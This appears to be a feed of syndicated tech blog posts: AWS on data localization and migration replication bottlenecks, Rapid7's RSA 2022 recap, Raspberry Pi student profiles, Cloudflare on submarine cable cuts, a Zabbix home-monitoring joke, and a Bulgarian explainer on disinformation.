Introducing a new AWS whitepaper: Does data localization cause more problems than it solves?

Post Syndicated from Jana Kay original https://aws.amazon.com/blogs/security/introducing-a-new-aws-whitepaper-does-data-localization-cause-more-problems-than-it-solves/

Amazon Web Services (AWS) recently released a new whitepaper, Does data localization cause more problems than it solves?, as part of the AWS Innovating Securely briefing series. The whitepaper draws on research from Emily Wu’s paper Sovereignty and Data Localization, published by Harvard University’s Belfer Center, and describes how countries can realize similar data localization objectives through AWS services without incurring the unintended effects highlighted by Wu.

Wu’s research analyzes the intent of data localization policies, and compares that to the reality of the policies’ effects, concluding that data localization policies are often counterproductive to their intended goals of data security, economic competitiveness, and protecting national values.

The new whitepaper explains how you can use the security capabilities of AWS to take advantage of up-to-date technology and help meet your data localization requirements while maintaining full control over the physical location of where your data is stored.

AWS offers robust privacy and security services and features that let you implement your own controls. AWS uses lessons learned around the globe and applies them at the local level for improved cybersecurity against security events. As an AWS customer, after you pick a geographic location to store your data, the cloud infrastructure provides you greater resiliency and availability than you can achieve by using on-prem infrastructure. When you choose an AWS Region, you maintain full control to determine the physical location of where your data is stored. AWS also provides you with resources through the AWS compliance program, to help you understand the robust controls in place at AWS to maintain security and compliance in the cloud.

An important finding of Wu’s research is that localization constraints can deter innovation and hurt local economies because they limit which services are available, or increase costs because there are a smaller number of service providers to choose from. Wu concludes that data localization can “raise the barriers [to entrepreneurs] for market entry, which suppresses entrepreneurial activity and reduces the ability for an economy to compete globally.” Data localization policies are especially challenging for companies that trade across national borders. International trade used to be the remit of only big corporations. Current data-driven efficiencies in shipping and logistics mean that international trade is open to companies of all sizes. There has been particular growth for small and medium enterprises involved in services trade (of which cross-border data flows are a key element). In a 2016 worldwide survey conducted by McKinsey, 86 percent of tech-based startups had at least one cross-border activity. The same report showed that cross-border data flows added some US$2.8 trillion to world GDP in 2014.

However, the availability of cloud services supports secure and efficient cross-border data flows, which in turn can contribute to national economic competitiveness. Deloitte Consulting’s report, The cloud imperative: Asia Pacific’s unmissable opportunity, estimates that by 2024, the cloud will contribute $260 billion to GDP across eight regional markets, with more benefit possible in the future. The World Trade Organization’s World Trade Report 2018 estimates that digital technologies, which includes advanced cloud services, will account for a 34 percent increase in global trade by 2030.

Wu also cites a link between national data governance policies and a government’s concerns that movement of data outside national borders can diminish their control. However, the technology, storage capacity, and compute power provided by hyperscale cloud service providers like AWS, can empower local entrepreneurs.

AWS continually updates practices to meet the evolving needs and expectations of both customers and regulators. This allows AWS customers to use effective tools for processing data, which can help them meet stringent local standards to protect national values and citizens’ rights.

Wu’s research concludes that “data localization is proving ineffective” for meeting intended national goals, and offers practical alternatives for policymakers to consider. Wu has several recommendations, such as continuing to invest in cybersecurity, supporting industry-led initiatives to develop shared standards and protocols, and promoting international cooperation around privacy and innovation. Despite the continued existence of data localization policies, countries can currently realize similar objectives through cloud services. AWS implements rigorous contractual, technical, and organizational measures to protect the confidentiality, integrity, and availability of customer data, regardless of which AWS Region you select to store their data. As an AWS customer, this means you can take advantage of the economic benefits and the support for innovation provided by cloud computing, while improving your ability to meet your core security and compliance requirements.

For more information, see the whitepaper Does data localization cause more problems than it solves?, or contact AWS.

If you have feedback about this post, submit comments in the Comments section below.

Author

Jana Kay

Since 2018, Jana Kay has been a cloud security strategist with the AWS Security Growth Strategies team. She develops innovative ways to help AWS customers achieve their objectives, such as security table top exercises and other strategic initiatives. Previously, she was a cyber, counter-terrorism, and Middle East expert for 16 years in the Pentagon’s Office of the Secretary of Defense.

Arturo Cabanas

Arturo Cabanas

Arturo joined Amazon in 2017 and is AWS Security Assurance Principal for the Public Sector in Latin America, Canada, and the Caribbean. In this role, Arturo creates programs that help governments move their workloads and regulated data to the cloud by meeting their specific security, data privacy regulation, and compliance requirements.

Identification of replication bottlenecks when using AWS Application Migration Service

Post Syndicated from Tobias Reekers original https://aws.amazon.com/blogs/architecture/identification-of-replication-bottlenecks-when-using-aws-application-migration-service/

Enterprises frequently begin their journey by re-hosting (lift-and-shift) their on-premises workloads into AWS and running Amazon Elastic Compute Cloud (Amazon EC2) instances. A simpler way to re-host is by using AWS Application Migration Service (Application Migration Service), a cloud-native migration service.

To streamline and expedite migrations, automate reusable migration patterns that work for a wide range of applications. Application Migration Service is the recommended migration service to lift-and-shift your applications to AWS.

In this blog post, we explore key variables that contribute to server replication speed when using Application Migration Service. We will also look at tests you can run to identify these bottlenecks and, where appropriate, include remediation steps.

Overview of migration using Application Migration Service

Figure 1 depicts the end-to-end data replication flow from source servers to a target machine hosted on AWS. The diagram is designed to help visualize potential bottlenecks within the data flow, which are denoted by a black diamond.

Data flow when using AWS Application Migration Service (black diamonds denote potential points of contention)

Figure 1. Data flow when using AWS Application Migration Service (black diamonds denote potential points of contention)

Baseline testing

To determine a baseline replication speed, we recommend performing a control test between your target AWS Region and the nearest Region to your source workloads. For example, if your source workloads are in a data center in Rome and your target Region is Paris, run a test between eu-south-1 (Milan) and eu-west-3 (Paris). This will give a theoretical upper bandwidth limit, as replication will occur over the AWS backbone. If the target Region is already the closest Region to your source workloads, run the test from within the same Region.

Network connectivity

There are several ways to establish connectivity between your on-premises location and AWS Region:

  1. Public internet
  2. VPN
  3. AWS Direct Connect

This section pertains to options 1 and 2. If facing replication speed issues, the first place to look is at network bandwidth. From a source machine within your internal network, run a speed test to calculate your bandwidth out to the internet; common test providers include Cloudflare, Ookla, and Google. This is your bandwidth to the internet, not to AWS.

Next, to confirm the data flow from within your data center, run a traceroute (Windows) or tracert (Linux). Identify any network hops that are unusual or potentially throttling bandwidth (due to hardware limitations or configuration).

To measure the maximum bandwidth between your data center and the AWS subnet that is being used for data replication, while accounting for Security Sockets Layer (SSL) encapsulation, use the CloudEndure SSL bandwidth tool (refer to Figure 1).

Source storage I/O

The next area to look for replication bottlenecks is source storage. The underlying storage for servers can be a point of contention. If the storage is maxing-out its read speeds, this will impact the data-replication rate. If your storage I/O is heavily utilized, it can impact block replication by Application Migration Service. In order to measure storage speeds, you can use the following tools:

  • Windows: WinSat (or other third-party tooling, like AS SSD Benchmark)
  • Linux: hdparm

We suggest reducing read/write operations on your source storage when starting your migration using Application Migration Service.

Application Migration Service EC2 replication instance size

The size of the EC2 replication server instance can also have an impact on the replication speed. Although it is recommended to keep the default instance size (t3.small), it can be increased if there are business requirements, like to speed up the initial data sync. Note: using a larger instance can lead to increased compute costs.

-508 (1)

Common replication instance changes include:

  • Servers with <26 disks: change the instance type to m5.large. Increase the instance type to m5.xlarge or higher, as needed.
  • Servers with <26 disks (or servers in AWS Regions that do not support m5 instance types): change the instance type to m4.large. Increase to m4.xlarge or higher, as needed.

Note: Changing the replication server instance type will not affect data replication. Data replication will automatically pick up where it left off, using the new instance type you selected.

Application Migration Service Elastic Block Store replication volume

You can customize the Amazon Elastic Block Store (Amazon EBS) volume type used by each disk within each source server in that source server’s settings (change staging disk type).

By default, disks <500GiB use Magnetic HDD volumes. AWS best practice suggests not change the default Amazon EBS volume type, unless there is a business need for doing so. However, as we aim to speed up the replication, we actively change the default EBS volume type.

There are two options to choose from:

  1. The lower cost, Throughput Optimized HDD (st1) option utilizes slower, less expensive disks.

-508 (2)

    • Consider this option if you(r):
      • Want to keep costs low
      • Large disks do not change frequently
      • Are not concerned with how long the initial sync process will take
  1. The faster, General Purpose SSD (gp2) option utilizes faster, but more expensive disks.

-508 (3)

    • Consider this option if you(r):
      • Source server has disks with a high write rate, or if you need faster performance in general
      • Want to speed up the initial sync process
      • Are willing to pay more for speed

Source server CPU

The Application Migration Service agent that is installed on the source machine for data replication uses a single core in most cases (agent threads can be scheduled to multiple cores). If core utilization reaches a maximum, this can be a limitation for replication speed. In order to check the core utilization:

  • Windows: Launch the Task Manger application within Windows, and click on the “CPU” tab. Right click on the CPU graph (this is currently showing an average of cores) > select “Change graph to” > “Logical processors”. This will show individual cores and their current utilization (Figure 2).
Logical processor CPU utilization

Figure 2. Logical processor CPU utilization

Linux: Install htop and run from the terminal. The htop command will display the Application Migration Service/CE process and indicate the CPU and memory utilization percentage (this is of the entire machine). You can check the CPU bars to determine if a CPU is being maxed-out (Figure 3).

AWS Application Migration Service/CE process to assess CPU utilization

Figure 3. AWS Application Migration Service/CE process to assess CPU utilization

Conclusion

In this post, we explored several key variables that contribute to server replication speed when using Application Migration Service. We encourage you to explore these key areas during your migration to determine if your replication speed can be optimized.

Related information

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/10/video-an-inside-look-at-the-rsa-2022-experience-from-the-rapid7-team/

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

The two years since the last RSA Conference have been pretty uneventful. Sure, COVID-19 sent us all to work from home for a little while, but it’s not as though we’ve seen any supply-chain-shattering breaches, headline-grabbing ransomware attacks, internet-inferno vulnerabilities, or anything like that. We’ve mostly just been baking sourdough bread and doing woodworking in between Zoom meetings.

OK, just kidding on basically all of that (although I, for one, have continued to hone my sourdough game). ​

The reality has been quite the opposite. Whether it’s because an unprecedented number of crazy things have happened since March 2020 or because pandemic-era uncertainty has made all of our experiences feel a little more heightened, the past 24 months have been a lot. And now that restrictions on gatherings are largely lifted in most places, many of us are feeling like we need a chance to get together and debrief on what we’ve all been through.

Given that context, what better timing could there have been for RSAC 2022? This past week, a crew of Rapid7 team members gathered in San Francisco to sync up with the greater cybersecurity community and take stock of how we can all stay ahead of attackers and ready for the future in the months to come. We asked four of them — Jeffrey Gardner, Practice Advisor – Detection & Response; Tod Beardsley, Director of Research; Kelly Allen, Social Media Manager; and Erick Galinkin, Principal Artificial Intelligence Researcher — to tell us a little bit about their RSAC 2022 experience. Here’s a look at what they had to say — and a glimpse into the excitement and energy of this year’s RSA Conference.

What’s it been like returning to full-scale in-person events after 2 years?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

What was your favorite session or speaker of the week? What made them stand out?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

What was your biggest takeaway from the conference? How will it shape the way you think about and practice cybersecurity in the months to come?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Want to relive the RSA experience for yourself? Check out our replays of Rapid7 speakers’ sessions from the week.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[$] Vetting the cargo

Post Syndicated from original https://lwn.net/Articles/897435/

Modern language environments make it easy to discover and incorporate
externally written libraries into a program. These same mechanisms can
also make it easy to inadvertently incorporate security vulnerabilities or
overtly malicious code, which is rather less gratifying. The stream of
resulting vulnerabilities seems like it will
never end, and it afflicts relatively safe
languages like Rust
just as much as any other language. In an effort
to avoid the embarrassment that comes with shipping vulnerabilities (or
worse) by way of its dependencies, the Mozilla project has come up with a new supply-chain management tool known as
cargo vet“.

I belong in computer science

Post Syndicated from Janina Ander original https://www.raspberrypi.org/blog/i-belong-in-computer-science-isaac-computer-science/

At the Raspberry Pi Foundation, we believe everyone belongs in computer science, and that it is a much more varied field than is commonly assumed. One of the ways we want to promote inclusivity and highlight the variety of skills and interests needed in computer science is through our ‘I belong’ campaign. We do this because the tech sector lacks diversity. Similarly, in schools, there is underrepresentation of students in computing along the axes of gender, ethnicity, and economic situation. (See how researchers describe data from England, and data from the USA.)

Woman teacher and female students at a computer

The ‘I belong’ campaign is part of our work on Isaac Computer Science, our free online learning platform for GCSE and A level students (ages 14 to 18) and their teachers, funded by the Department for Education. The campaign celebrates young computer scientists and how they came to love the subject, what their career journey has been so far, and what their thoughts are about inclusivity and belonging in their chosen field.

These people are role models who demonstrate that everyone belongs in computer science, and that everyone can bring their interests and skills to bear in the field. In this way, we want to show young people that they can do much more with computing than they might think, and to inspire them to consider how computing could be part of their own life and career path.

Meet Salome

Salome is studying Computer Science with Digital Technology Solutions at the University of Leeds and doing a degree apprenticeship with PricewaterhouseCoopers (PwC).

Salome smiling. The text says I belong in computer science.

“I was quite lucky, as growing up I saw a lot about women in STEM which inspired me to take this path. I think to improve the online community, we need to keep challenging stereotypes and getting more and more people to join, thereby improving the diversity. This way, a larger number of people can have role models and identify themselves with someone currently there.”

“Another thing is the assumption that computer science is just coding and not a wide and diverse field. I still have to explain to my friends what computer science involves and can become, and then they will say, ‘Wow, that’s really interesting, I didn’t know that.’”

Meet Devyani

Devyani is a third-year degree apprentice at Cisco. 

Devyani smiling. The text says I belong in computer science.

“It was at A level where I developed my programming skills, and it was more practical rather than theoretical. I managed to complete a programming project where I utilised PHP, JavaScript, and phpMyAdmin (which is a database). It was after this that I started looking around and applying for degree apprenticeships. I thought that university wasn’t for me, because I wanted a more practical and hands-on approach, as I learn better that way.”

“At the moment, I’m currently doing a product owner role, which is where I hope to graduate into. It’s a mix between both a business role and a technical role. I have to stay up to speed with the current technologies we are using and developing for our clients and customers, but also I have to understand business needs and ensure that the team is able to develop and deliver on time to meet those needs.”

Meet Omar

Omar is a Mexican palaeontologist who uses computer science to study dinosaur bones.

Omar. The text says I belong in computer science.

“I try to bring aspects that are very well developed in computer science and apply them in palaeontology. For instance, when digitising the vertebrae, I use a lot of information theory. I also use a lot of data science and integrity to make sure that what we have captured is comparable with what other people have found.”

“What drove me to computers was the fact you are always learning. That’s what keeps me interested in science: that I can keep growing, learn from others, and I can teach people. That’s the other thing that makes me feel like I belong, which is when I am able to communicate the things I know to someone else and I can see the face of the other person when they start to grasp a theory.”

Meet Tasnima

Tasnima is a computer science graduate from Queen Mary University of London, and is currently working as a software engineer at Credit Suisse.

Tasnima smiling. The text says I belong in computer science.

“During the pandemic, one of the good things to come out of it is that I could work from home, and that means working with people all over the world, bringing together every race, religion, gender, etc. Even though we are all very different, the one thing we all have in common is that we’re passionate about technology and computer science. Another thing is being able to work in technology in the real world. It has allowed me to work in an environment that is highly collaborative. I always feel like you’re involved from the get-go.”

“I think we need to also break the image that computer science is all about coding. I’ve had friends that have stayed away from any tech jobs because they think that they don’t want to code, but there’s so many other roles within technology and jobs that actually require no coding whatsoever.”

Meet Aleena

Aleena is a software engineer who works at a health tech startup in London and is also studying for a master’s degree in AI ethics at the University of Cambridge.

Aleena smiling. The text says I belong in computer science.

“I do quite a lot of different things as an engineer. It’s not just coding, which is part of it but it is a relatively small percentage, compared to a lot of other things. […] There’s a lot of collaborative time and I would say a quarter or third of the week is me by myself writing code. The other time is spent collaborating and working with other people and making sure that we’re all aligned on what we are working on.”

“I think it’s actually a very diverse field of tech to work in, once you actually end up in the industry. When studying STEM subjects at a college or university level it is often not very diverse. The industry is the opposite. A lot of people come from self-taught or bootcamp backgrounds, there’s a lot of ways to get into tech and software engineering, and I really like that aspect of it. Computer science isn’t the only way to go about it.”

Meet Alice

Alice is a final-year undergraduate student of Computer Science with Artificial Intelligence at the University of Brighton. She is also the winner of the Global Challenges COVID-19 Research Scholarship offered by Santander Universities.

Alice wearing a mask over her face and mouth. The text says I belong in computer science.

“[W]e need to advertise computer science as more than just a room full of computers, and to advertise computer sciences as highly collaborative. It’s very creative. If you’re on a team of developers, there’s a lot of communication involved.”

“There’s something about computer science that I think is so special: the fact that it is a skill anybody can learn, regardless of who they are. With the right idea, anybody can build anything.”

Share these stories to inspire

Help us spread the message that everyone belongs in computer science: share this blog with schools, teachers, STEM clubs, parents, and young people you want to inspire.

You can learn computer science with us

Whether you’re studying or teaching computer science GCSE or A levels in the UK (or thinking about doing so!), or you’re a teacher or student in another part of the world, Isaac Computer Science is here to help you achieve your computer science goals. Our high-quality learning platform is free to use and open to all. As a student, you can register to keep track of your progress. As a teacher, you can sign up to guide your students’ learning.

Two teenage boys do coding at a shared computer during a computer science lesson while their woman teacher observes them.

And for younger learners, we have lots of fun project guides to try out coding and creating with digital technologies.

Three teenage girls at a laptop

The post I belong in computer science appeared first on Raspberry Pi.

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

Post Syndicated from David Belson original https://blog.cloudflare.com/aae-1-smw5-cable-cuts/

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

Just after 1200 UTC on Tuesday, June 7, the Africa-Asia-Europe-1 (AAE-1) and SEA-ME-WE-5 (SMW-5) submarine cables suffered cable cuts. The damage reportedly occurred in Egypt, and impacted Internet connectivity for millions of Internet users across multiple countries in the Middle East and Africa, as well as thousands of miles away in Asia. In addition, Google Cloud Platform and OVHcloud reported connectivity issues due to these cable cuts.

The impact

Data from Cloudflare Radar showed significant drops in traffic across the impacted countries as the cable damage occurred, recovering approximately four hours later as the cables were repaired.

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries
AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

It appears that Saudi Arabia may have also been affected by the cable cut(s), but the impact was much less significant, and traffic recovered almost immediately.

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

In the graphs above, we show that Ethiopia was one of the impacted countries. However, as it is landlocked, there are obviously no submarine cable landing points within the country. The Afterfibre map from the Network Startup Resource Center (NSRC) shows that that fiber in Ethiopia connects to fiber in Somalia, which experienced an impact. In addition, Ethio Telecom also routes traffic through network providers in Kenya and Djibouti. Djibouti Telecom, one of these providers, in turn peers with larger global providers like Telecom Italia (TI) Sparkle, which is one of the owners of SMW5.

In addition to impacting end-user connectivity in the impacted countries, the cable cuts also reportedly impacted cloud providers including Google Cloud Platform and OVHcloud. In their incident report, Google Cloud noted “Google Cloud Networking experienced increased packet loss for egress traffic from Google to the Middle East, and elevated latency between our Europe and Asia Regions as a result, for 3 hours and 12 minutes, affecting several related products including Cloud NAT, Hybrid Connectivity and Virtual Private Cloud (VPC). From preliminary analysis, the root cause of the issue was a capacity shortage following two simultaneous fiber-cuts.” OVHcloud noted that “Backbone links between Marseille and Singapore are currently down” and that “Upon further investigation, our Network OPERATION teams advised that the fault was related to our partner fiber cuts.”

When concurrent disruptions like those highlighted above are observed across multiple countries in one or more geographic areas, the culprit is often a submarine cable that connects the impacted countries to the global Internet. The impact of such cable cuts will vary across countries, largely due to the levels of redundancy that they may have in place. That is, are these countries solely dependent on an impacted cable for global Internet connectivity, or do they have redundant connectivity across other submarine or terrestrial cables? Additionally, the location of the country relative to the cable cut will also impact how connectivity in a given country may be affected. Due to these factors, we didn’t see a similar impact across all of the countries connected to the AAE-1 and SMW5 cables.

What happened?

Specific details are sparse, but as noted above, the cable damage reportedly occurred in Egypt – both of the impacted cables land in Abu Talat and Zafarana, which also serve as landing points for a number of other submarine cables. According to a 2021 article in Middle East Eye, “There are 10 cable landing stations on Egypt’s Mediterranean and Red Sea coastlines, and some 15 terrestrial crossing routes across the country.” Alan Mauldin, research director at telecommunications research firm TeleGeography, notes that routing cables between Europe and the Middle East to India is done via Egypt, because there is the least amount of land to cross. This places the country in a unique position as a choke point for international Internet connectivity, with damage to infrastructure locally impacting the ability of millions of people thousands of miles away to access websites and applications, as well as impacting connectivity for leading cloud platform providers.

As the graphs above show, traffic returned to normal levels within a matter of hours, with tweets from telecommunications authorities in Pakistan and Oman also noting that Internet services had returned to their countries. Such rapid repairs to submarine cable infrastructure are unusual, as repair timeframes are often measured in days or weeks, as we saw with the cables damaged by the volcanic eruption in Tonga earlier this year. This is due to the need to locate the fault, send repair ships to the appropriate location, and then retrieve the cable and repair it. Given this, the damage to these cables likely occurred on land, after they came ashore.

Keeping content available

By deploying in data centers close to end users, Cloudflare helps to keep traffic local, which can mitigate the impact of catastrophic events like cable cuts, while improving performance, availability, and security. Being able to deliver content from our network generally requires first retrieving it from an origin, and with end users around the world, Cloudflare needs to be able to reach origins from multiple points around the world at the same time. However, a customer origin may be reachable from some networks but not from others, due to a cable cut or some other network disruption.

In September 2021, Cloudflare announced Orpheus, which provides reachability benefits for customers by finding unreachable paths on the Internet in real time, and guiding traffic away from those paths, ensuring that Cloudflare will always be able to reach an origin no matter what is happening on the Internet.

Conclusion

Because the Internet is an interconnected network of networks, an event such as a cable cut can have a ripple effect across the whole Internet, impacting connectivity for users thousands of miles away from where the incident occurred. Users may be unable to access content or applications, or the content/applications may suffer from reduced performance. Additionally, the providers of those applications may experience problems within their own network infrastructure due to such an event.

For network providers, the impact of such events can be mitigated through the use of multiple upstream providers/peers, and diverse physical paths for critical infrastructure like submarine cables. Cloudflare’s globally deployed network can help content and application providers ensure that their content and applications remain available and performant in the face of network disruptions.

What’s Up, Home? – Don’t Forget the Facial Cream

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-dont-forget-the-facial-cream/21063/

Can you monitor the regular use of facial cream with Zabbix? Of course, you can! Here’s how. This same method could be very useful for monitoring if the elderly remember to take their meds or so.

What the heck?

A little background story. My forehead has a tendency for dry skin, so I should be using facial cream daily. Of course, as a man, I can guarantee you that 100% of the days I remember to use the cream, I apply it, so in practice, this means about 40-50% hit ratio.

As lately I have been adding more monitored targets to my home Zabbix, one night my wife probably thought she was being snarky or funny when she said “One monitor I could happily receive data about would be how often you remember to use your facial cream.

A monitoring nerd does not take such ideas lightly.

Howdy door sensor, would you like to do some work?

I found a spare magnetic door sensor and a handy box where to store the cream.

You can see where this is going. This totally beautiful prototype of my Facial Cream Smart Storage Box is now deployed to test. If I open or close the box, the door sensor status changes, thus the facial cream mercy countdown timer resets.

How does it work? And does it really work?

Cozify smart IoT hub is keeping an eye on the magnetic door sensor’s last status change. And look, that awesome brown tape does not bother the magnets at all, Cozify reported the status as changed.

Now that I got the Cozify part working, my Zabbix can then receive the last change time as in Unix time.

On my Grafana, there’s now this absolutely gorgeous new panel, converting the Unix time to the “How long ago the last event happened?” indicator.

So the dashboard part is now working. But that is not all we need to do.

Alerting and escalation

Dashboards and monitoring are not useful at all if proper alerts are not being sent out. I now have this new alert trigger action rule in place.

In other words, if I forget to apply the facial cream, I have a one-hour time window to apply it, or otherwise, the alert gets escalated to my wife.

Will this method work? Is my prototype box reliable? I will tell you next time.

I have been working at Forcepoint since 2014 and never get tired of finding out new areas to monitor. — Janne Pikkarainen

The post What’s Up, Home? – Don’t Forget the Facial Cream appeared first on Zabbix Blog.

Какво е манипулативно съдържание?

Post Syndicated from Йоанна Елми original https://toest.bg/kakvo-e-manipulativno-sudurzhanie/

През последните две години сме свидетели на инфодемия, свързана с пандемията от COVID-19. Днес инфодемията продължава, но фокусирана върху войната в Украйна.

Какво представлява манипулативното съдържание?

Манипулативното съдържание може да включва в себе си неверни твърдения или да се базира на вярна информация, която е извадена от контекст или изкривена така, че да пасне на определена теза. Манипулативното съдържание често се описва със съкращението МДМ – мисинформация, дезинформация и малинформация.

Дезинформацията означава напълно невярна информация, която обикновено е разпространена преднамерено, понякога координирано и с цел да подведе потребителя. Пример за такъв тип информация е твърдение на сайта The Bulgarian Times как редица лаборатории са установили, че коронавирусът не съществува. Като източник е посочен американски сайт, посветен на борбата с флуора, в чиято оригинална статия откриваме сканиран документ от стандартна лабораторна процедура със спорадични подчертавания, без да е ясна връзката им с аргумента. Българският сайт, известен със системното разпространяване на невярна информация, цитира новината като потвърждение от 187 лаборатории, че коронавирусът не съществува. В твърдението няма никаква истина.

Нещо повече – в оригиналната статия се твърди, че научните лаборатории крият истината, тоест лъжат, докато българската статия ги използва с легитимираща цел, тоест като подкрепа за аргумента, че коронавирусът не съществува, в пълно противоречие с оригинала, който е цитиран. Вътрешните противоречия са чест сигнал за манипулирана информация. В допълнение, когато данните не са експлицитно обяснени, а просто се цитират множество числа, имена и институции, това често пъти има за цел да обърка читателя, което спомага за постигане на определено внушение, тъй като се губи логическата последователност между събитията и представените данни.

Мисинформацията също не е истина, но не се разпространява умишлено – често мисинформацията започва като дезинформация, която е споделена от нищо неподозиращи потребители. За разлика от първите два типа, в които става въпрос за лъжи, малинформацията се базира на истината, но се използва, за да навреди някому – личност, организация, държава. Такава информация може да е вярна, но да има премълчан контекст или умишлено превратно тълкуване на определени събития – всъщност по-голямата част от невярната информация е именно такава, а не директни лъжи.

Пример откриваме отново в същия сайт, където легитимни данни от доклад на Агенцията по здравна сигурност на Обединеното кралство се цитират погрешно и с превратна интерпретация. Първо, в материала на сайта се твърди, че става дума за „необработени данни“, без да се дефинира казаното – данните в доклада са обработени и представени в таблици с необходимите статистически интервали и пояснение за разчитане на резултатите. В статията се описва, че „общо 1 086 434 случая на СОVID-19 са регистрирани при ваксинирани лица, което представлява 73% от всички случаи през този период“. Това обаче е непълна информация и създава невярно внушение: в доклада изрично се посочва ефективността на ваксините при превенция от хоспитализация, тежко протичане на болестта и смърт.

В статията се премълчава и основната бележка за интерпретиране на данните – при население с много висок процент на ваксинално покритие е напълно нормално да има висок процент заразени ваксинирани просто защото мнозинството от хората са ваксинирани. Въпросът е при колко от тях заболяването протича тежко – леталният край продължава да е в пъти по-вероятен при неваксинираните, което в материала липсва. Вместо това се поднасят множество разбъркани данни от най-различни места, като отново целта е объркване на читателя. В рамките на няколко дни статията е споделена в множество Facebook групи.

Голяма част от съвременната пропаганда е именно малинформация. Пропагандата се отличава от горните понятия по това, че информацията се разпространява от заинтересована страна, която цели да обрисува свой опонент в изключително негативна светлина, както и да култивира определени идеи и доктрини. Пропагандата може да бъде държавна, партийна или друга и често си служи с всякакъв вид манипулативно съдържание.

Информационно замърсяване

На първо време изобилието от манипулативно съдържание – иначе казано, информационно замърсяване – се подпомага от това, че голяма част от новинарското съдържание онлайн е безплатно и лесносмилаемо. Множество сайтове се издържат от приходи за реклами – тяхната цел е да задържат потребителя максимално дълго на страницата, а това често става с публикуване на сензационно и екстремистко съдържание, което е семпло и не отегчава. Разбира се, има и сайтове, които са инструменти за пропаганда и част от координирани дезинформационни кампании. Невярната онлайн информация е и по-достъпна от вярната, която често е по-сложна и изисква повече усилия както за създаване, проверка и корекция, така и за осмисляне.

Манипулативната информация разчита основно на социалните мрежи, където всеки потребител може да усили разпространението на съдържание, което незадължително отговаря на професионалните стандарти. В допълнение на това социалните мрежи дават предимство на чувствата пред разума, а манипулативното съдържание се заиграва именно с тези психологически и емоционални лостове. Журналистите също могат да имат роля в създаването и разпространението на невярна информация, когато им липсват високи професионални стандарти или имат тежки политически зависимости и предразсъдъци – какъвто, за съжаление, нерядко е случаят в България.

Също така не е достатъчно просто да посочим, че определена медия или автор са ненадеждни – необходими са аргументи защо. Това е обаче един от парадоксите на невярната информация: тя е количествено много повече от вярната и опровергаването на всяка неистина е трудно и времеемко, а журналистите просто нямат такъв ресурс. Регулацията на медиите пък е сложна и трудно осъществима от държавата, ако искаме да избегнем цензурата. Към момента решението остава в ръцете на медийния потребител, който трябва да се научи да разпознава манипулацията. В противен случай невярната информация постига най-голямата си цел: публиката спира да вярва на всякаква информация, включително на добрата журналистика, което пък е пагубно за демокрацията и свободата.

Имената имат значение

Ако при липса на авторство, непрозрачна собственост на медията и крещящи заглавия трябва да ни светва лампичка, това невинаги е напълно достатъчно, за да сме сигурни, че четем манипулативна информация. Основно правило е, че когато статията е подписана от журналист, а медията има прозрачна собственост, етичен кодекс и адрес за кореспонденция, това осигурява по-добра отчетност за качеството на информацията и предоставя на читателя механизми за контакт с редакцията и журналиста в случай на грешки.

Авторите и източниците на дадена информация имат огромно значение. Един от основните разпространители на невярна информация в разгара на пандемията – Венцислав Ангелов – Чикагото, на когото дължим невярното твърдение, че „самолетите пръскат с коронавирус“ – днес е свързан с огромния транспарант пред сградата на правителството, който гласи, че „войната в Украйна е истинското лице на глобалния сатанизъм“, пред което България трябва да запази „пълен неутралитет“. Клиповете на Чикагото се разпространяват в десетки Facebook групи от профил на име Антон Желязков. Той пък на свой ред системно споделя статии от сайта vsekidenbg.eu, чиито първи публикации са от края на април т.г. и са с насочено антиправителствено и проруско съдържание.

На страницата за контакт на vsekidenbg.eu намираме шаблонно съдържание, недействителни имейли и телефонни номера, а като локация се посочва щатът Юта, САЩ. Това не пречи статия от сайта, в която Путин обещава да накаже виновниците за пандемията, да бъде споделена в проруска Facebook група и в рамките на по-малко от ден да генерира 45 коментара и 66 последващи споделяния. Седмица по-късно съдържанието се разпространява от множество потребители онлайн, независимо дали сериозно, с цел порицаване или със сатиричен коментар. Сайтът публикува и фотографии и видеа, без да се посочва дали това съдържание е минало през проверка на произхода и фактите, както обичайно се прави от професионалните журналисти.

Друг пример за важността на източниците е Facebook групата БРОД, в която членуват над 18 000 души и чиято хронология проследява ясно маркирана дезинформационна траектория – от Стратегията за детето, през антиковид съдържание, до изключително проруски и антиукраински информационни материали в настоящето. В този случай не е ясно кое е първо – яйцето или кокошката, тъй като е напълно възможно потребителите на БРОД да се информират от едни и същи източници, които преливат от една дезинформационна линия в друга. Тогава би ставало дума за дезинформация или малинформация, преминала в мисинформация.

Политическа поляризация

Проблемът с адресирането на манипулативното съдържание се влошава и от нарастващата политическа поляризация. Това е още по-затруднено от емпирично доказания факт, че определени политически партии и идеолози разчитат системно повече на дезинформацията. Така опровергаването на дадена теза може да се възприеме като директна атака срещу политическите пристрастия на даден човек, откъдето да се провокира много силна реактивност и резистентност към опровергаването ѝ – и с това се затваря порочният кръг. Погрешните схващания, които са обвързани с политически пристрастия, най-малко се поддават на промяна, тъй като човек трудно подлага на преоценка вече изградени възгледи. Хората, занимаващи се с дезинформация, разчитат именно на това.

